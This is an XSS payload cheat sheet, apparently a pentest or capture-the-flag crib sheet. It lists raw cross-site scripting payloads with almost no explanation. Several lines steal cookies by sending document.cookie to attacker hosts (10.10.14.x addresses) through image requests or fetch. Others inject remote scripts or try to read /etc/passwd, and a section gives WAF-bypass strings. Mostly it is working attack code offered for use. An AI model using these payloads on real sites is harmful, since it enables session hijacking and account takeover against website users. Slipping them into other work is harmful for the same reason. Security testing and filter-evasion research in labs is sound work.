XSS Payload Cheat Sheet
๐ฏ Basic Payloads <svg/onload="alert(document.cookie)"> <iframe src="data:image/svg+xml;base64,CjxzdmcgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+CiAgPGNpcmNsZSByPSIxMCIgY3g9IjEwIiBjeT0iMTAiIGZpbGw9ImdyZWVuIi8+CiAgPGltYWdlIGhyZWY9IngiIG9uZXJyb3I9ImphdmFzY3JpcHQ6YWxlcnQoJ1hTUycpIiAvPgo8L3N2Zz4="></iframe> <script>var i=new Image(); i.src="http://10.10.14.54/?cookie="+btoa(document.cookie);</script> <script>var i=new Image;i.src="http://10.10.14.7:8888/?cookie="+document.cookie;</script> <script> document.write('<img src="http://10.10.14.54/?cookie='+document.cookie+'" />'); </script> <img src/onerror=this.src="http://10.10.14.74/?cookie="+btoa(document.cookie)> <img src="http://10.10.14.54/" onload="var i=0;if(i++)this.src+='?cookie='+encodeURIComponent(document.cookie);"/> <script>fetch('http://10.10.14.19:8000/?cookie=' + btoa(document.cookie));</script> ๐งจ Local File Access / Script Injection <img src=xasdasdasd onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/> <img src=gdgdgdfgert onerror="document.write('<script src=http://127.0.0.1/test.js></script>')"/> <img src=x onerror=fetch('http://10.10.xx.xx/?cookie='+document.cookie);> ๐ต๏ธโโ๏ธ WAF Bypass Strings for XSS <Img src = x onerror = "javascript: window.onerror = alert; throw XSS"> <Video> <source onerror = "javascript: alert (XSS)"> <Input value = "XSS" type = text> <applet code="javascript:confirm(document.cookie);"> <isindex x="javascript:" onmouseover="alert(XSS)"> "></SCRIPT>โ>โ><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> "><img src="x:x" onerror="alert(XSS)"> "><iframe src="javascript:alert(XSS)"> <object data="javascript:alert(XSS)"> <isindex type=image src=1 onerror=alert(XSS)> <img src=x:alert(alt) onerror=eval(src) alt=0> <img src="x:gif" onerror="window "></img> <iframe/src="data:text/html,<svg onload=alert(1)>"> <meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/> <svg><script xlink:href=data:,window.open('https://www.google.com/')></script <meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> <iframe src=javascript:alert(document.location)> <form><a href="javascript:\u0061lert(1)">X </script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'> <style>//*{x:expression(alert(/xss/))}//<style></style> ๐ Resources ๐ OWASP XSS Filter Evasion Cheat Sheet ...